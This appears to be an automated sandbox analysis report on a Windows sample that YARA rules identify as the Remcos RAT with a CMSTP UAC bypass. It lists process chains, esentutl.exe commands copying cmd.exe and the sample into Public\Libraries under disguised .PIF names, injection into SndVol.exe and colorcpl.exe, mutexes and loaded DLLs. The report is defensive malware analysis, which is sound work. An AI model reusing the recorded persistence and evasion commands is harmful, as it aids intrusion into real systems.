              Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine; Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@18/8@14/3
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2914798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_2914798D
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_0041798D
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077E86AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_077E86AA
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Code function: 0_2_02C57FD4 GetDiskFreeSpaceA,0_2_02C57FD4
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Code function: 0_2_02C6AD98 CreateToolhelp32Snapshot,0_2_02C6AD98
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Code function: 0_2_02C66DC8 CoCreateInstance,0_2_02C66DC8
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2914B539 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_2914B539
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2914AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_2914AB9E
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; File created: C:\Users\Public\Libraries\PNO
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\SysWOW64\SndVol.exe; Mutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
Source: C:\Windows\SysWOW64\SndVol.exe; Mutant created: \Sessions\1\BaseNamedObjects\Resignation-X9RTX9
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Selebzih.PIF; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: jlPBMMQbXC.exe; ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; File read: C:\Users\user\Desktop\jlPBMMQbXC.exe
Source: unknown; Process created: C:\Users\user\Desktop\jlPBMMQbXC.exe "C:\Users\user\Desktop\jlPBMMQbXC.exe"
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hizbeleS.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jlPBMMQbXC.exe /d C:\\Users\\Public\\Libraries\\Selebzih.PIF /o
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\esentutl.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Users\Public\Libraries\Selebzih.PIF "C:\Users\Public\Libraries\Selebzih.PIF"
Source: C:\Users\Public\Libraries\Selebzih.PIF; Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: unknown; Process created: C:\Users\Public\Libraries\Selebzih.PIF "C:\Users\Public\Libraries\Selebzih.PIF"
Source: C:\Users\Public\Libraries\Selebzih.PIF; Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: version.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: url.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: userenv.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: netutils.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: wldp.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: propsys.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe    Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
              Source: C:\Windows\SysWOW64\colorcpl.exe - Window found: window name: SysTabControl32
              Source: Window Recorder - Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\colorcpl.exe - Window detected: Number of UI elements: 12
              Source: jlPBMMQbXC.exe - Static file information: File size 1243648 > 1048576
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: jlPBMMQbXC.exe, jlPBMMQbXC.exe, 00000000.00000002.1577348813.00000000023E6000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1564129488.0000000005420000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
              Source: Binary string: easinvoker.pdbH source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: jlPBMMQbXC.exe, 00000000.00000002.1577348813.00000000023E6000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E41E000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E44F000.00000004.00000020.00020000.00000000.sdmp
